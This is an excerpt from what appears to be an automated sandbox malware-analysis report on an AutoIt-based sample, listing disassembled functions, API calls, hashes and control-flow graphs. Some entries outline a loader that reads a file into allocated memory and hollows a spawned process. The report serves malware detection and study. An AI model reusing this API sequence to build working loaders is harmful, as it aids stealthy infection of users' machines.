              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
              • API String ID: 98802146-2727554177
              • Opcode ID: 4791c3cb5fc6fbc689d9389b15f960770e75618001c1425df07a554156c7de44
              • Instruction ID: dc0eb2053d3abf49d6fd92b1ba64864e9878e76d5ca4e9013eeafbc660286080
              • Opcode Fuzzy Hash: 4791c3cb5fc6fbc689d9389b15f960770e75618001c1425df07a554156c7de44
              • Instruction Fuzzy Hash: A571B6715043009FC744EF69DC418ABBBE8FF86740F40842EF545872B1EB789A49CB59
              Function 006D2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 006D2B8E
              • LoadCursorW.USER32(00000000,00007F00), ref: 006D2B9D
              • LoadIconW.USER32(00000063), ref: 006D2BB3
              • LoadIconW.USER32(000000A4), ref: 006D2BC5
              • LoadIconW.USER32(000000A2), ref: 006D2BD7
              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006D2BEF
              • RegisterClassExW.USER32(?), ref: 006D2C40
                • Part of subcall function 006D2CD4: GetSysColorBrush.USER32(0000000F), ref: 006D2D07
                • Part of subcall function 006D2CD4: RegisterClassExW.USER32(00000030), ref: 006D2D31
                • Part of subcall function 006D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006D2D42
                • Part of subcall function 006D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 006D2D5F
                • Part of subcall function 006D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006D2D6F
                • Part of subcall function 006D2CD4: LoadIconW.USER32(000000A9), ref: 006D2D85
                • Part of subcall function 006D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006D2D94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
              • String ID: #$0$AutoIt v3
              • API String ID: 423443420-4155596026
              • Opcode ID: f6d9fe7856e3c8a7354fb36c54262a62cdc0eea2523d96967e22a9d9ffcae6af
              • Instruction ID: 7553c93a847984972d24c8f2b4edff7a2396c84a6737d1a18b6c23467bec22d9
              • Opcode Fuzzy Hash: f6d9fe7856e3c8a7354fb36c54262a62cdc0eea2523d96967e22a9d9ffcae6af
              • Instruction Fuzzy Hash: A7213874E00328AFEF119FA5EC55AA97FF4FB89B50F40802AE505A66A0D3B90540CF98
              Function 006DB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
              Download Yara Rule
              APIs
              • __Init_thread_footer.LIBCMT ref: 006DBB4E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: p#z$p#z$p#z$p#z$p%z$p%z$x#z$x#z
              • API String ID: 1385522511-1284704788
              • Opcode ID: 4ec2818770f85ea7b984ab4cb3980e279c943042b8b502cb815c5ef230b3dab9
              • Instruction ID: 721285d8659759c0c7bd81cec89dafe187ed59db21ee90547f6f82226ab269af
              • Opcode Fuzzy Hash: 4ec2818770f85ea7b984ab4cb3980e279c943042b8b502cb815c5ef230b3dab9
              • Instruction Fuzzy Hash: 1C329D34E00219DFDB14CF58C894ABEB7B6FF46310F16805AE915AB356C778AD42CBA1
              Function 006D3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 761 6d3170-6d3185 762 6d31e5-6d31e7 761->762 763 6d3187-6d318a 761->763 762->763 766 6d31e9 762->766 764 6d318c-6d3193 763->764 765 6d31eb 763->765 767 6d3199-6d319e 764->767 768 6d3265-6d326d PostQuitMessage 764->768 770 712dfb-712e23 call 6d18e2 call 6ee499 765->770 771 6d31f1-6d31f6 765->771 769 6d31d0-6d31d8 DefWindowProcW 766->769 773 6d31a4-6d31a8 767->773 774 712e7c-712e90 call 73bf30 767->774 776 6d3219-6d321b 768->776 775 6d31de-6d31e4 769->775 806 712e28-712e2f 770->806 777 6d321d-6d3244 SetTimer RegisterWindowMessageW 771->777 778 6d31f8-6d31fb 771->778 780 6d31ae-6d31b3 773->780 781 712e68-712e77 call 73c161 773->781 774->776 799 712e96 774->799 776->775 777->776 782 6d3246-6d3251 CreatePopupMenu 777->782 784 6d3201-6d3214 KillTimer call 6d30f2 call 6d3c50 778->784 785 712d9c-712d9f 778->785 789 6d31b9-6d31be 780->789 790 712e4d-712e54 780->790 781->776 782->776 784->776 792 712da1-712da5 785->792 793 712dd7-712df6 MoveWindow 785->793 797 6d31c4-6d31ca 789->797 798 6d3253-6d3263 call 6d326f 789->798 790->769 802 712e5a-712e63 call 730ad7 790->802 800 712da7-712daa 792->800 801 712dc6-712dd2 SetFocus 792->801 793->776 797->769 797->806 798->776 799->769 800->797 807 712db0-712dc1 call 6d18e2 800->807 801->776 802->769 806->769 810 712e35-712e48 call 6d30f2 call 6d3837 806->810 807->776 810->769
              APIs
              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006D316A,?,?), ref: 006D31D8
              • KillTimer.USER32(?,00000001,?,?,?,?,?,006D316A,?,?), ref: 006D3204
              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006D3227
              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006D316A,?,?), ref: 006D3232
              • CreatePopupMenu.USER32 ref: 006D3246
              • PostQuitMessage.USER32(00000000), ref: 006D3267
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
              • String ID: TaskbarCreated
              • API String ID: 129472671-2362178303
              • Opcode ID: cd151b0d83ca9ac18536566dfafa0400343550417e7bb65e33de03ee1d050927
              • Instruction ID: 317a016b31a23cfbf3fec66c0101b0bc463eafdfe01ad8dcbd26cf9c7b3828b7
              • Opcode Fuzzy Hash: cd151b0d83ca9ac18536566dfafa0400343550417e7bb65e33de03ee1d050927
              • Instruction Fuzzy Hash: A2414C35E00261A7EF151F789C0D7B9361BE786340F048127F542853E2C7AE9B4197AB
              Function 006DDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: D%z$D%z$D%z$D%z$D%zD%z$Variable must be of type 'Object'.
              • API String ID: 0-1874280672
              • Opcode ID: 8303d12e2cc865d3599008438d0a4f61e74f7a9edb887e8c2f2ecbd9080d5590
              • Instruction ID: 1b46072e2f65bd35412a9813bf7e5d9bcaff1260729c27f0cccc1bcf8af2f3bc
              • Opcode Fuzzy Hash: 8303d12e2cc865d3599008438d0a4f61e74f7a9edb887e8c2f2ecbd9080d5590
              • Instruction Fuzzy Hash: 43C28F71E00215CFCB24EF58D880AADB7B2BF49310F24855AE915AF351D37AED42CB95
              Function 006DEC40 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1195COMMON
              Download Yara Rule
              APIs
              • __Init_thread_footer.LIBCMT ref: 006DFE66
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: D%z$D%z$D%z$D%z$D%zD%z
              • API String ID: 1385522511-3500222704
              • Opcode ID: ea92b81b212d096856a76c79705f4e076e542716ddba99b25a2cb48f4fa618e6
              • Instruction ID: 6a9b397f0a8664fa6b1de827f49c658b2baa3dca5138f19f9e79fc226d788e79
              • Opcode Fuzzy Hash: ea92b81b212d096856a76c79705f4e076e542716ddba99b25a2cb48f4fa618e6
              • Instruction Fuzzy Hash: 55B27D74A08340CFDB24DF18D490A6AB7F2BF99310F24896EE8869B351D775ED41CB92
              Function 015C2600 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1770 15c2600-15c26ae call 15c0000 1773 15c26b5-15c26db call 15c3510 CreateFileW 1770->1773 1776 15c26dd 1773->1776 1777 15c26e2-15c26f2 1773->1777 1778 15c282d-15c2831 1776->1778 1785 15c26f9-15c2713 VirtualAlloc 1777->1785 1786 15c26f4 1777->1786 1779 15c2873-15c2876 1778->1779 1780 15c2833-15c2837 1778->1780 1782 15c2879-15c2880 1779->1782 1783 15c2839-15c283c 1780->1783 1784 15c2843-15c2847 1780->1784 1789 15c28d5-15c28ea 1782->1789 1790 15c2882-15c288d 1782->1790 1783->1784 1791 15c2849-15c2853 1784->1791 1792 15c2857-15c285b 1784->1792 1787 15c271a-15c2731 ReadFile 1785->1787 1788 15c2715 1785->1788 1786->1778 1793 15c2738-15c2778 VirtualAlloc 1787->1793 1794 15c2733 1787->1794 1788->1778 1797 15c28ec-15c28f7 VirtualFree 1789->1797 1798 15c28fa-15c2902 1789->1798 1795 15c288f 1790->1795 1796 15c2891-15c289d 1790->1796 1791->1792 1799 15c285d-15c2867 1792->1799 1800 15c286b 1792->1800 1801 15c277f-15c279a call 15c3760 1793->1801 1802 15c277a 1793->1802 1794->1778 1795->1789 1803 15c289f-15c28af 1796->1803 1804 15c28b1-15c28bd 1796->1804 1797->1798 1799->1800 1800->1779 1810 15c27a5-15c27af 1801->1810 1802->1778 1806 15c28d3 1803->1806 1807 15c28bf-15c28c8 1804->1807 1808 15c28ca-15c28d0 1804->1808 1806->1782 1807->1806 1808->1806 1811 15c27b1-15c27e0 call 15c3760 1810->1811 1812 15c27e2-15c27f6 call 15c3570 1810->1812 1811->1810 1817 15c27f8 1812->1817 1818 15c27fa-15c27fe 1812->1818 1817->1778 1820 15c280a-15c280e 1818->1820 1821 15c2800-15c2804 FindCloseChangeNotification 1818->1821 1822 15c281e-15c2827 1820->1822 1823 15c2810-15c281b VirtualFree 1820->1823 1821->1820 1822->1773 1822->1778 1823->1822
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015C26D1
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015C28F7
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
              • Instruction ID: 9321df6059c4d8a7ba7af8118766fd8e0c42b9d7aa68b4eb94e7d82b9eaa2216
              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
              • Instruction Fuzzy Hash: 61A1E674E00209EFDB14CFE4C894BEEBBB5BF48704F208559E601BB281D7799A81CB94
              Function 006D2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1834 6d2c63-6d2cd3 CreateWindowExW * 2 ShowWindow * 2
              APIs
              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006D2C91
              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006D2CB2
              • ShowWindow.USER32(00000000,?,?,?,?,?,?,006D1CAD,?), ref: 006D2CC6
              • ShowWindow.USER32(00000000,?,?,?,?,?,?,006D1CAD,?), ref: 006D2CCF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$CreateShow
              • String ID: AutoIt v3$edit
              • API String ID: 1584632944-3779509399
              • Opcode ID: 8af7501be3801dd75187bb8726b3ba6a6747097ff38a971ee5dfa69d0d93c0a4
              • Instruction ID: 787d24c39cf6fb796c215e81ff7ac9d04635382443816d346e496bd3e0d5c981
              • Opcode Fuzzy Hash: 8af7501be3801dd75187bb8726b3ba6a6747097ff38a971ee5dfa69d0d93c0a4
              • Instruction Fuzzy Hash: A2F0DA765403A07AFB311B17AC08E773EBDD7C7F61F40805AF900A29A0C6A91850DEB8
              Function 015C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1949 15c23b0-15c2501 call 15c0000 call 15c22a0 CreateFileW 1956 15c2508-15c2518 1949->1956 1957 15c2503 1949->1957 1960 15c251f-15c2539 VirtualAlloc 1956->1960 1961 15c251a 1956->1961 1958 15c25b8-15c25bd 1957->1958 1962 15c253d-15c2554 ReadFile 1960->1962 1963 15c253b 1960->1963 1961->1958 1964 15c2558-15c2592 call 15c22e0 call 15c12a0 1962->1964 1965 15c2556 1962->1965 1963->1958 1970 15c25ae-15c25b6 ExitProcess 1964->1970 1971 15c2594-15c25a9 call 15c2330 1964->1971 1965->1958 1970->1958 1971->1970
              APIs
                • Part of subcall function 015C22A0: Sleep.KERNELBASE(000001F4), ref: 015C22B1
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015C24F7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateFileSleep
              • String ID: BK5I8PL0TMUA
              • API String ID: 2694422964-4168286228
              • Opcode ID: fb8660892dd52fe47b9c078653069ff0d547368b5b6709e27a79123520aeee8c
              • Instruction ID: 3959f679a6c69e0664cb0304b6e168e220770dcc11aa262a21d108794f4a7f42
              • Opcode Fuzzy Hash: fb8660892dd52fe47b9c078653069ff0d547368b5b6709e27a79123520aeee8c
              • Instruction Fuzzy Hash: 0E51A330E14248EBEF11DBE4D854BEFB775AF68700F004199E609BB2C0DAB91B45CBA5
              Function 00742947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1973 742947-7429b9 call 711f50 call 7425d6 call 6efe0b call 6d5722 call 74274e call 6d511f call 6f5232 1988 742a6c-742a73 call 742e66 1973->1988 1989 7429bf-7429c6 call 742e66 1973->1989 1994 742a75-742a77 1988->1994 1995 742a7c 1988->1995 1989->1994 1996 7429cc-742a6a call 6fd583 call 6f4983 call 6f9038 call 6fd583 call 6f9038 * 2 1989->1996 1997 742cb6-742cb7 1994->1997 1999 742a7f-742b3a call 6d50f5 * 8 call 743017 call 6fe5eb 1995->1999 1996->1999 2001 742cd5-742cdb 1997->2001 2038 742b43-742b5e call 742792 1999->2038 2039 742b3c-742b3e 1999->2039 2005 742cf0-742cf6 2001->2005 2006 742cdd-742ced call 6efdcd call 6efe14 2001->2006 2006->2005 2042 742b64-742b6c 2038->2042 2043 742bf0-742bfc call 6fe678 2038->2043 2039->1997 2044 742b74 2042->2044 2045 742b6e-742b72 2042->2045 2050 742c12-742c16 2043->2050 2051 742bfe-742c0d DeleteFileW 2043->2051 2047 742b79-742b97 call 6d50f5 2044->2047 2045->2047 2057 742bc1-742bd7 call 74211d call 6fdbb3 2047->2057 2058 742b99-742b9e 2047->2058 2053 742c91-742ca5 CopyFileW 2050->2053 2054 742c18-742c7e call 7425d6 call 6fd2eb * 2 call 7422ce 2050->2054 2051->1997 2055 742ca7-742cb4 DeleteFileW 2053->2055 2056 742cb9-742ccf DeleteFileW call 742fd8 2053->2056 2054->2056 2078 742c80-742c8f DeleteFileW 2054->2078 2055->1997 2067 742cd4 2056->2067 2073 742bdc-742be7 2057->2073 2063 742ba1-742bb4 call 7428d2 2058->2063 2071 742bb6-742bbf 2063->2071 2067->2001 2071->2057 2073->2042 2075 742bed 2073->2075 2075->2043 2078->1997
              APIs
              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00742C05
              • DeleteFileW.KERNEL32(?), ref: 00742C87
              • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00742C9D
              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00742CAE
              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00742CC0
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: File$Delete$Copy
              • String ID:
              • API String ID: 3226157194-0
              • Opcode ID: f3528f63f7905f826e35ecdde586b6b69bc89900f1fa4381b82e3e7a41748364
              • Instruction ID: 445dfe9723d1cc7f5bda5f376bfaf13b66ee5bf9e829e6538597da3803ab7554
              • Opcode Fuzzy Hash: f3528f63f7905f826e35ecdde586b6b69bc89900f1fa4381b82e3e7a41748364
              • Instruction Fuzzy Hash: 10B16EB1D0011DABDF11DBA4CC85EEEBB7DEF48300F5040AAFA09E6152EB349A558F65
              Function 00705AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2353 705aa9-705ace 2354 705ad0-705ad2 2353->2354 2355 705ad7-705ad9 2353->2355 2356 705ca5-705cb4 call 6f0a8c 2354->2356 2357 705afa-705b1f 2355->2357 2358 705adb-705af5 call 6ff2c6 call 6ff2d9 call 7027ec 2355->2358 2359 705b21-705b24 2357->2359 2360 705b26-705b2c 2357->2360 2358->2356 2359->2360 2363 705b4e-705b53 2359->2363 2364 705b4b 2360->2364 2365 705b2e-705b46 call 6ff2c6 call 6ff2d9 call 7027ec 2360->2365 2369 705b64-705b6d call 70564e 2363->2369 2370 705b55-705b61 call 709424 2363->2370 2364->2363 2404 705c9c-705c9f 2365->2404 2381 705ba8-705bba 2369->2381 2382 705b6f-705b71 2369->2382 2370->2369 2387 705c02-705c23 WriteFile 2381->2387 2388 705bbc-705bc2 2381->2388 2384 705b73-705b78 2382->2384 2385 705b95-705b9e call 70542e 2382->2385 2389 705c6c-705c7e 2384->2389 2390 705b7e-705b8b call 7055e1 2384->2390 2403 705ba3-705ba6 2385->2403 2393 705c25-705c2b GetLastError 2387->2393 2394 705c2e 2387->2394 2395 705bf2-705c00 call 7056c4 2388->2395 2396 705bc4-705bc7 2388->2396 2401 705c80-705c83 2389->2401 2402 705c89-705c99 call 6ff2d9 call 6ff2c6 2389->2402 2413 705b8e-705b90 2390->2413 2393->2394 2405 705c31-705c3c 2394->2405 2395->2403 2397 705be2-705bf0 call 705891 2396->2397 2398 705bc9-705bcc 2396->2398 2397->2403 2398->2389 2406 705bd2-705be0 call 7057a3 2398->2406 2401->2402 2411 705c85-705c87 2401->2411 2402->2404 2403->2413 2407 705ca4 2404->2407 2414 705ca1 2405->2414 2415 705c3e-705c43 2405->2415 2406->2403 2407->2356 2411->2407 2413->2405 2414->2407 2419 705c45-705c4a 2415->2419 2420 705c69 2415->2420 2421 705c60-705c67 call 6ff2a3 2419->2421 2422 705c4c-705c5e call 6ff2d9 call 6ff2c6 2419->2422 2420->2389 2421->2404 2422->2404
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: JOm
              • API String ID: 0-3333332779
              • Opcode ID: cde4c688588551de0a28c681058d18ecc55db013d10646234923373592580bfd
              • Instruction ID: ec307cee2fc0882e5dbade6ab52665bad6e072e5f87d58178f11db81b096e02d
              • Opcode Fuzzy Hash: cde4c688588551de0a28c681058d18ecc55db013d10646234923373592580bfd
              • Instruction Fuzzy Hash: 3451CEB190060AEFDF219FA4C849EBFBBF9AF45314F14025AF405A72D2D6799A01CF61
              Function 006D3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006D3B0F,SwapMouseButtons,00000004,?), ref: 006D3B40
              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006D3B0F,SwapMouseButtons,00000004,?), ref: 006D3B61
              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,006D3B0F,SwapMouseButtons,00000004,?), ref: 006D3B83
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID: Control Panel\Mouse
              • API String ID: 3677997916-824357125
              • Opcode ID: 2a1ac18a7148543ce1773203751be109abdcc8a83c13f953537b7875f6a4ae53
              • Instruction ID: a016f2bcac2245288c30e5814549a6a72c063dfa92362300d28b2eb19b8a528d
              • Opcode Fuzzy Hash: 2a1ac18a7148543ce1773203751be109abdcc8a83c13f953537b7875f6a4ae53
              • Instruction Fuzzy Hash: 64112AB5910218FFDB218FA5DC44AEEB7B9EF24744B10846BE845D7310E2719E409765
              Function 015C12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 015C1A5B
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015C1AF1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015C1B13
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: 6e999cef06aac06fcde311c2673bbf8567a4d88a660ea8880241fb15dada5407
              • Instruction ID: 46ac78179c7dd6424199e40c8f378067642917b5b93fdca2f90491272fcde3dd
              • Opcode Fuzzy Hash: 6e999cef06aac06fcde311c2673bbf8567a4d88a660ea8880241fb15dada5407
              • Instruction Fuzzy Hash: 05620930A14618DBEB24DFA4C880BDEB772FF58700F1095A9D10DEB291E7799E81CB59
              Function 006D3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
              Download Yara Rule
              APIs
              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007133A2
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006D3A04
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
